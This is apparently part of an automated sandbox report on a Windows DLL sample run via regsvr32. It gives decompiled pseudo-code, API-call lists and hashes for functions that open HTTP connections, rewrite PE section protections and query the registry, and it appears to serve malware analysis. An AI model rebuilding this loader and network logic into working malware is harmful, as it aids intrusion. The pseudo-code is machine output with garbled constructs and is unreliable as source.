                                    				_t4 = E6E2A1A1C(_a4); // executed
                                    				_t9 = _t4;
                                    				if(_t9 == 0) {
                                    					SetThreadPriority(_t13, _t4);
                                    				}
                                    				asm("lock xadd [eax], ecx");
                                    				return _t9;
                                    			}


                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 6E2A1FCC
                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E2A1FD7
                                    • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 6E2A1FEA
                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E2A1FFD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Thread$Priority$AffinityCurrentMask
                                    • String ID:
                                    • API String ID: 1452675757-0
                                    • Opcode ID: f27333f064e96b9e23ae9bc2535ad0c2a08f0a3ef841fb1c8708dd4f7fe2f3f3
                                    • Instruction ID: 933c9516cd3ecfd417e87d0147ceb7bd339fea5337530321817f355fedd7e6fd
                                    • Opcode Fuzzy Hash: f27333f064e96b9e23ae9bc2535ad0c2a08f0a3ef841fb1c8708dd4f7fe2f3f3
                                    • Instruction Fuzzy Hash: DBE092712097166B97016A6D4C8CE6FB75EEF823317020235F620D22D0CB948C0AC9B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 21%
                                    			E001A6F10(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* _t37;
                                    				long _t39;
                                    				long _t40;
                                    				void* _t41;
                                    				intOrPtr _t42;
                                    				void* _t43;
                                    				intOrPtr _t44;
                                    				intOrPtr _t45;
                                    				intOrPtr _t46;
                                    				intOrPtr _t48;
                                    				void* _t65;
                                    				intOrPtr* _t67;
                                    				intOrPtr* _t68;
                                    				void* _t71;
                                    
                                    				_t68 = __esi;
                                    				_t65 = E001A5691(_t37, _a4);
                                    				if(_t65 == 0) {
                                    					L18:
                                    					_t39 = GetLastError();
                                    				} else {
                                    					_t40 = GetVersion();
                                    					_t71 = _t40 - 6;
                                    					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
                                    						_a4 = 4;
                                    					} else {
                                    						_a4 = 0;
                                    					}
                                    					__imp__(_t65, _a4, 0, 0, 0); // executed
                                    					 *(_t68 + 0x10) = _t40;
                                    					_t41 = E001A77EC(_t65);
                                    					if( *(_t68 + 0x10) == 0) {
                                    						goto L18;
                                    					} else {
                                    						_t42 = E001A5691(_t41,  *_t68);
                                    						_v8 = _t42;
                                    						if(_t42 == 0) {
                                    							goto L18;
                                    						} else {
                                    							_t67 = __imp__; // 0x72b23ddc
                                    							if(_a8 == 0) {
                                    								L10:
                                    								__imp__( *(_t68 + 0x10), _v8, 0x50, 0); // executed
                                    								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
                                    								_t43 = E001A77EC(_v8);
                                    								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
                                    									goto L18;
                                    								} else {
                                    									_a4 = 0x100;
                                    									_t44 = E001A5691(_t43,  *((intOrPtr*)(_t68 + 4)));
                                    									_v8 = _t44;
                                    									if(_t44 == 0) {
                                    										goto L18;
                                    									} else {
                                    										_t45 =  *0x1aa2d4; // 0x314d7d0
                                    										_t21 = _t45 + 0x1ab76c; // 0x450047
                                    										_t46 = _t21;
                                    										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
                                    										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
                                    										E001A77EC(_v8);
                                    										_t48 =  *((intOrPtr*)(_t68 + 0x18));
                                    										if(_t48 == 0) {
                                    											goto L18;
                                    										} else {
                                    											_v12 = 4;
                                    											__imp__(_t48, 0x1f,  &_a4,  &_v12);
                                    											if(_t48 != 0) {
                                    												_a4 = _a4 | 0x00000100;
                                    												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
                                    											}
                                    											_push(4);
                                    											_push( &_a8);
                                    											_push(6);
                                    											_push( *((intOrPtr*)(_t68 + 0x18)));
                                    											if( *_t67() == 0) {
                                    												goto L18;
                                    											} else {
                                    												_push(4);
                                    												_push( &_a8);
                                    												_push(5);
                                    												_push( *((intOrPtr*)(_t68 + 0x18)));
                                    												if( *_t67() == 0) {
                                    													goto L18;
                                    												} else {
                                    													_t39 = 0;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							} else {
                                    								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
                                    								if(_t42 == 0) {
                                    									goto L18;
                                    								} else {
                                    									goto L10;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _t39;
                                    			}

                                    APIs
                                      • Part of subcall function 001A5691: lstrlen.KERNEL32(?,00000000,032F9F00,754B94D8,001A291A,032FA0FD,001A5FB9,001A5FB9,?,001A5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 001A5698
                                      • Part of subcall function 001A5691: mbstowcs.NTDLL ref: 001A56C1
                                      • Part of subcall function 001A5691: memset.NTDLL ref: 001A56D3
                                    • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,b+t,001A6A09,b+t,00000000,032F98C0,?,?,001A3771,?,032F98C0,0000EA60), ref: 001A6F2B
                                    • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,b+t,001A6A09,b+t,00000000,032F98C0,?,?,001A3771,?,032F98C0,0000EA60), ref: 001A705B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                    • String ID: b+t
                                    • API String ID: 4097109750-83008628
                                    • Opcode ID: 2d77b00681ce4505de0726b5d5828e5f77ed9cb75ee13d53f70591c80d8fda98
                                    • Instruction ID: 1d4dd4228afb6d5fcc257b100065c57161886efeb172ae737b0cae114cced04d
                                    • Opcode Fuzzy Hash: 2d77b00681ce4505de0726b5d5828e5f77ed9cb75ee13d53f70591c80d8fda98
                                    • Instruction Fuzzy Hash: F44171B9500209FFDF209F60CD85EAB7BB9EB06780F108529B645964E1D771EF84DB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 6E2C6D3C: GetLastError.KERNEL32(?,?,6E2C7EEB), ref: 6E2C6D40
                                      • Part of subcall function 6E2C6D3C: _free.LIBCMT ref: 6E2C6D73
                                      • Part of subcall function 6E2C6D3C: SetLastError.KERNEL32(00000000,?,?,6E2C7EEB), ref: 6E2C6DB4
                                      • Part of subcall function 6E2C7FFD: _free.LIBCMT ref: 6E2C8063
                                      • Part of subcall function 6E2C7C72: GetOEMCP.KERNEL32(00000000,?,?,6E2C7EFB,?), ref: 6E2C7C9D
                                    • _free.LIBCMT ref: 6E2C7F56
                                    • _free.LIBCMT ref: 6E2C7F8C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorLast
                                    • String ID: Pc/n
                                    • API String ID: 3291180501-416207349
                                    • Opcode ID: a6a711f023f78b83fa9d552c0e4e15b14fa506f964470af7051ca7e2c0ae96c3
                                    • Instruction ID: 14e59b87ea637247e95539f4ed85027c78912ed7c161f385d9f1be1360bae0e3
                                    • Opcode Fuzzy Hash: a6a711f023f78b83fa9d552c0e4e15b14fa506f964470af7051ca7e2c0ae96c3
                                    • Instruction Fuzzy Hash: E131E23190420DAFDB81DBF9D480B99B7FBEF45B25F204699E4189B2D0EB329D41CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E001A14C4(void* __edx) {
                                    				void* _v8;
                                    				int _v12;
                                    				WCHAR* _v16;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* _t23;
                                    				intOrPtr _t24;
                                    				void* _t26;
                                    				intOrPtr _t32;
                                    				intOrPtr _t35;
                                    				intOrPtr _t38;
                                    				intOrPtr _t42;
                                    				void* _t45;
                                    				void* _t50;
                                    				void* _t52;
                                    
                                    				_t50 = __edx;
                                    				_v12 = 0;
                                    				_t23 = E001A1FBC(0,  &_v8); // executed
                                    				if(_t23 != 0) {
                                    					_v8 = 0;
                                    				}
                                    				_t24 =  *0x1aa2d4; // 0x314d7d0
                                    				_t4 = _t24 + 0x1abd70; // 0x32f9540
                                    				_t5 = _t24 + 0x1abd18; // 0x4f0053
                                    				_t26 = E001A6A1E( &_v16, _v8, _t5, _t4); // executed
                                    				_t45 = _t26;
                                    				if(_t45 == 0) {
                                    					StrToIntExW(_v16, 0,  &_v12);
                                    					_t45 = 8;
                                    					if(_v12 < _t45) {
                                    						_t45 = 1;
                                    						__eflags = 1;
                                    					} else {
                                    						_t32 =  *0x1aa2d4; // 0x314d7d0
                                    						_t11 = _t32 + 0x1abd64; // 0x32f9534
                                    						_t48 = _t11;
                                    						_t12 = _t32 + 0x1abd18; // 0x4f0053
                                    						_t52 = E001A73AF(_t11, _t12, _t11);
                                    						_t59 = _t52;
                                    						if(_t52 != 0) {
                                    							_t35 =  *0x1aa2d4; // 0x314d7d0
                                    							_t13 = _t35 + 0x1abdae; // 0x30314549
                                    							if(E001A3D26(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                    								_t61 =  *0x1aa2b4 - 6;
                                    								if( *0x1aa2b4 <= 6) {
                                    									_t42 =  *0x1aa2d4; // 0x314d7d0
                                    									_t15 = _t42 + 0x1abbba; // 0x52384549
                                    									E001A3D26(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                    								}
                                    							}
                                    							_t38 =  *0x1aa2d4; // 0x314d7d0
                                    							_t17 = _t38 + 0x1abda8; // 0x32f9578
                                    							_t18 = _t38 + 0x1abd80; // 0x680043
                                    							_t45 = E001A2A5C(_v8, 0x80000001, _t52, _t18, _t17);
                                    							HeapFree( *0x1aa290, 0, _t52);
                                    						}
                                    					}
                                    					HeapFree( *0x1aa290, 0, _v16);
                                    				}
                                    				_t54 = _v8;
                                    				if(_v8 != 0) {
                                    					E001A44B9(_t54);
                                    				}
                                    				return _t45;
                                    			}

                                    APIs
                                    • StrToIntExW.SHLWAPI(?,00000000,?), ref: 001A1513
                                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 001A15B0
                                    • HeapFree.KERNEL32(00000000,?), ref: 001A15C2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: cf054e54aed9ae6c5206b0a3613fe9f253c1eedd2f6eca9f15589643a8966490
                                    • Instruction ID: b2d3f71135f3748d8341dc529b8d97b26bacb23e34e4ecc81f89de7a5b4e96d9
                                    • Opcode Fuzzy Hash: cf054e54aed9ae6c5206b0a3613fe9f253c1eedd2f6eca9f15589643a8966490
                                    • Instruction Fuzzy Hash: 9231BC35A04248BFCB21DBE4DD84EEA7BB8EF4B704F2000A6B501A7162D3719A48DB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E6E2A1D96(void* __eax, void* _a4) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				long _v20;
                                    				int _t43;
                                    				long _t54;
                                    				signed int _t57;
                                    				void* _t58;
                                    				signed int _t60;
                                    
                                    				_v12 = _v12 & 0x00000000;
                                    				_t57 =  *0x6e2a41cc;
                                    				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                    				_v16 =  *(__eax + 6) & 0x0000ffff;
                                    				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                                    				_v8 = _v8 & 0x00000000;
                                    				if(_v16 <= 0) {
                                    					L12:
                                    					return _v12;
                                    				} else {
                                    					goto L1;
                                    				}
                                    				while(1) {
                                    					L1:
                                    					_t60 = _v12;
                                    					if(_t60 != 0) {
                                    						goto L12;
                                    					}
                                    					asm("bt [esi+0x24], eax");
                                    					if(_t60 >= 0) {
                                    						asm("bt [esi+0x24], eax");
                                    						if(__eflags >= 0) {
                                    							L8:
                                    							_t54 = _t57 - 0x69b25f40;
                                    							L9:
                                    							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                    							if(_t43 == 0) {
                                    								_v12 = GetLastError();
                                    							}
                                    							_v8 = _v8 + 1;
                                    							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                                    							if(_v8 < _v16) {
                                    								continue;
                                    							} else {
                                    								goto L12;
                                    							}
                                    						}
                                    						asm("bt [esi+0x24], eax");
                                    						_t54 = _t57 - 0x69b25f42;
                                    						if(__eflags >= 0) {
                                    							goto L9;
                                    						}
                                    						goto L8;
                                    					}
                                    					asm("bt [esi+0x24], eax");
                                    					if(_t60 >= 0) {
                                    						_t54 = _t57 - 0x69b25f24;
                                    					} else {
                                    						_t54 = _t57 - 0x69b25f04;
                                    					}
                                    					goto L9;
                                    				}
                                    				goto L12;
                                    			}

                                    APIs
                                    • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?), ref: 6E2A1DCF
                                    • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 6E2A1E44
                                    • GetLastError.KERNEL32 ref: 6E2A1E4A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual$ErrorLast
                                    • String ID:
                                    • API String ID: 1469625949-0
                                    • Opcode ID: 761d2738c57bbef194e5780b26925e0abcf4d284dc539131525dcfbf8780b0a2
                                    • Instruction ID: 266554e6d1a431c5e19d2f8c6347ba47d335ad9fc8a779cee3a41cbee000549e
                                    • Opcode Fuzzy Hash: 761d2738c57bbef194e5780b26925e0abcf4d284dc539131525dcfbf8780b0a2
                                    • Instruction Fuzzy Hash: CB2160B180020EDFCB14CFD9C985AAEF7B9FF08355F014459D206D7149E7B4AAA9CB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 80%
                                    			E6E2A1CDB() {
                                    				char _v28;
                                    				void _v44;
                                    				char _v48;
                                    				void* _v52;
                                    				long _t23;
                                    				int _t24;
                                    				void* _t28;
                                    				intOrPtr* _t30;
                                    				signed int _t34;
                                    				intOrPtr _t36;
                                    
                                    				_push(0);
                                    				_push(0x6e2a41c4);
                                    				_push(1);
                                    				_push( *0x6e2a41d0 + 0x6e2a5089);
                                    				 *0x6e2a41c0 = 0xc;
                                    				 *0x6e2a41c8 = 0; // executed
                                    				L6E2A1262(); // executed
                                    				_t34 = 6;
                                    				memset( &_v44, 0, _t34 << 2);
                                    				if(E6E2A1344( &_v44,  &_v28,  *0x6e2a41cc ^ 0xf7a71548) == 0) {
                                    					_t23 = 0xb;
                                    					L7:
                                    					ExitThread(_t23);
                                    				}
                                    				_t24 = lstrlenW( *0x6e2a41b8);
                                    				_t7 = _t24 + 2; // 0x2
                                    				_t10 = _t24 + _t7 + 8; // 0xa
                                    				_t28 = E6E2A109B(_t36, _t10,  &_v48,  &_v52); // executed
                                    				if(_t28 == 0) {
                                    					_t30 = _v52;
                                    					 *_t30 = 0;
                                    					if( *0x6e2a41b8 == 0) {
                                    						 *((short*)(_t30 + 4)) = 0;
                                    					} else {
                                    						E6E2A212C(_t40, _t30 + 4);
                                    					}
                                    				}
                                    				_t23 = E6E2A1B55(_v44); // executed
                                    				goto L7;
                                    			}

                                    APIs
                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E2A41C4,00000000), ref: 6E2A1D0C
                                    • lstrlenW.KERNEL32(?,?,?), ref: 6E2A1D40
                                      • Part of subcall function 6E2A109B: GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E2A10A8
                                      • Part of subcall function 6E2A109B: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E2A10BE
                                      • Part of subcall function 6E2A109B: _snwprintf.NTDLL ref: 6E2A10E3
                                      • Part of subcall function 6E2A109B: CreateFileMappingW.KERNELBASE(000000FF,6E2A41C0,00000004,00000000,?,?), ref: 6E2A1108
                                      • Part of subcall function 6E2A109B: GetLastError.KERNEL32 ref: 6E2A111F
                                      • Part of subcall function 6E2A109B: CloseHandle.KERNEL32(00000000), ref: 6E2A1154
                                    • ExitThread.KERNEL32 ref: 6E2A1D8F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                    • String ID:
                                    • API String ID: 4209869662-0
                                    • Opcode ID: 0b7cb6bcc26a777c81fadae5148854af98b7bfb7702008d69438ba4050da7605
                                    • Instruction ID: c3064a6d9410010cf8ac58330e4fd7e90868374d9cb6c0d8d5a0ec07a1eb846f
                                    • Opcode Fuzzy Hash: 0b7cb6bcc26a777c81fadae5148854af98b7bfb7702008d69438ba4050da7605
                                    • Instruction Fuzzy Hash: AC119DB2104A0AAFDB01CBACCC48D8B77EEFB45764F050A16F650D7150DB30E58ACBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E001A3B34(void* __ecx, void* __eflags) {
                                    				char _v8;
                                    				void* _v12;
                                    				int _v16;
                                    				int _v20;
                                    				intOrPtr _t15;
                                    				intOrPtr _t19;
                                    				long _t24;
                                    				long _t29;
                                    				short* _t31;
                                    				short* _t34;
                                    
                                    				_t15 =  *0x1aa2d4; // 0x314d7d0
                                    				_v8 = _v8 & 0x00000000;
                                    				_t3 = _t15 + 0x1aba40; // 0x4f0053
                                    				_v16 = 4;
                                    				_t31 = E001A1440(__ecx, _t3);
                                    				if(_t31 != 0) {
                                    					_t19 =  *0x1aa2d4; // 0x314d7d0
                                    					_t5 = _t19 + 0x1aba9c; // 0x6e0049
                                    					_t34 = E001A1440(__ecx, _t5);
                                    					if(_t34 != 0) {
                                    						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                                    						if(_t24 == 0) {
                                    							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                                    							if(_t29 != 0) {
                                    								_v8 = _v8 & 0x00000000;
                                    							}
                                    							RegCloseKey(_v12);
                                    						}
                                    						E001A77EC(_t34);
                                    					}
                                    					E001A77EC(_t31);
                                    				}
                                    				return _v8;
                                    			}

                                    APIs
                                      • Part of subcall function 001A1440: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,001A3B57,004F0053,00000000,?), ref: 001A1449
                                      • Part of subcall function 001A1440: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,001A3B57,004F0053,00000000,?), ref: 001A1473
                                      • Part of subcall function 001A1440: memset.NTDLL ref: 001A1487
                                    • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 001A3B86
                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 001A3BA2
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A3BB3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                    • String ID:
                                    • API String ID: 830012212-0
                                    • Opcode ID: 2496023c26c84e4a15067c38dc940b3319d3ff1d1a999b837694e6c4cd426c92
                                    • Instruction ID: 31b489b92a116db2538338f6a07ffbc6576c7060d8962308dde8ac86cc24cfac
                                    • Opcode Fuzzy Hash: 2496023c26c84e4a15067c38dc940b3319d3ff1d1a999b837694e6c4cd426c92
                                    • Instruction Fuzzy Hash: C0115B7A600209BFDB11DBD8CD89FAEB7BCAF06300F140099F201E7052EB749A08DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 32%
                                    			E001A2566(intOrPtr _a4, signed int _a8) {
                                    				long _v8;
                                    				long _v12;
                                    				char _v16;
                                    				void* _t14;
                                    				long _t15;
                                    				char* _t17;
                                    				intOrPtr* _t19;
                                    				signed int _t22;
                                    
                                    				_t19 = __imp__; // 0x72b2797d
                                    				_t22 =  ~_a8;
                                    				_v12 = 0;
                                    				asm("sbb esi, esi");
                                    				while(1) {
                                    					_v8 = 0;
                                    					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                                    					if(_t14 != 0) {
                                    						break;
                                    					}
                                    					_t15 = GetLastError();
                                    					_v8 = _t15;
                                    					if(_t15 != 0x2f8f) {
                                    						if(_t15 == 0x2f00) {
                                    							continue;
                                    						}
                                    					} else {
                                    						_v16 = 0x3300;
                                    						if(_v12 == 0) {
                                    							_t17 =  &_v16;
                                    							__imp__(_a4, 0x1f, _t17, 4);
                                    							if(_t17 == 0) {
                                    								_v8 = GetLastError();
                                    							} else {
                                    								_v12 = 1;
                                    								continue;
                                    							}
                                    						}
                                    					}
                                    					L9:
                                    					return _v8;
                                    				}
                                    				goto L9;
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID: b+t
                                    • API String ID: 1452528299-83008628
                                    • Opcode ID: f7a7592a9a136d7bde2e305725e35e35fef1ad2588f2e9d4ef688f4874ecbc18
                                    • Instruction ID: 8bdd336e1602a4dff016785ea02a4023591e92a790557b064a607e704ede9dbc
                                    • Opcode Fuzzy Hash: f7a7592a9a136d7bde2e305725e35e35fef1ad2588f2e9d4ef688f4874ecbc18
                                    • Instruction Fuzzy Hash: 430129B9D00109FBDF109F9ADC58DEEBFB8FB96750F108166E900E6190D7718A84DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 6E2C7D6F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Info
                                    • String ID:
                                    • API String ID: 1807457897-3916222277
                                    • Opcode ID: a982c09cff08d1670b5db547a0dcff4f898120f127031bbdbad99bdc31e6bf8c
                                    • Instruction ID: f986e258283acc58b55c60c2d8bea33f0ff87ec0b561c0c77a3e0bf648c25642
                                    • Opcode Fuzzy Hash: a982c09cff08d1670b5db547a0dcff4f898120f127031bbdbad99bdc31e6bf8c
                                    • Instruction Fuzzy Hash: F241187150429C9FDB628EB8CC84EE67BFFEB06B08F1405ECD59987182D2359E45CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 6E2C7C72: GetOEMCP.KERNEL32(00000000,?,?,6E2C7EFB,?), ref: 6E2C7C9D
                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,6E2C7F40,?,00000000), ref: 6E2C8113
                                    • GetCPInfo.KERNEL32(00000000,6E2C7F40,?,?,?,6E2C7F40,?,00000000), ref: 6E2C8126
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CodeInfoPageValid
                                    • String ID:
                                    • API String ID: 546120528-0
                                    • Opcode ID: fbbc4d01b8fa773e8cb1deac3784df7a02c2a59e26462ef1047687681b0cb9f9
                                    • Instruction ID: 3b114e601f68d87f487e84293577620141d75b418500e1bb86374dcde28f99e1
                                    • Opcode Fuzzy Hash: fbbc4d01b8fa773e8cb1deac3784df7a02c2a59e26462ef1047687681b0cb9f9
                                    • Instruction Fuzzy Hash: 0851577090068E9FD7988FB5C894AABBBFBEF41B00F14866EC09987140D7B5A501CB93
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E001A18B7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                    				void* _v8;
                                    				void* __esi;
                                    				intOrPtr* _t35;
                                    				intOrPtr* _t41;
                                    				intOrPtr* _t43;
                                    				intOrPtr* _t45;
                                    				intOrPtr* _t50;
                                    				intOrPtr* _t52;
                                    				void* _t54;
                                    				intOrPtr* _t55;
                                    				intOrPtr* _t57;
                                    				intOrPtr* _t61;
                                    				intOrPtr* _t65;
                                    				intOrPtr _t68;
                                    				void* _t72;
                                    				void* _t75;
                                    				void* _t76;
                                    
                                    				_t55 = _a4;
                                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                                    				_a4 = 0;
                                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                    				if(_t76 < 0) {
                                    					L18:
                                    					return _t76;
                                    				}
                                    				_t76 = E001A56E3(_v8, _a8, _a12, _a20,  &_a20,  &_a12);
                                    				if(_t76 >= 0) {
                                    					_t61 = _a28;
                                    					if(_t61 != 0 &&  *_t61 != 0) {
                                    						_t52 = _v8;
                                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                    					}
                                    					if(_t76 >= 0) {
                                    						_t43 =  *_t55;
                                    						_t68 =  *0x1aa2d4; // 0x314d7d0
                                    						_t20 = _t68 + 0x1ab1fc; // 0x740053
                                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                    						if(_t76 >= 0) {
                                    							_t76 = E001A609E(_a4);
                                    							if(_t76 >= 0) {
                                    								_t65 = _a28;
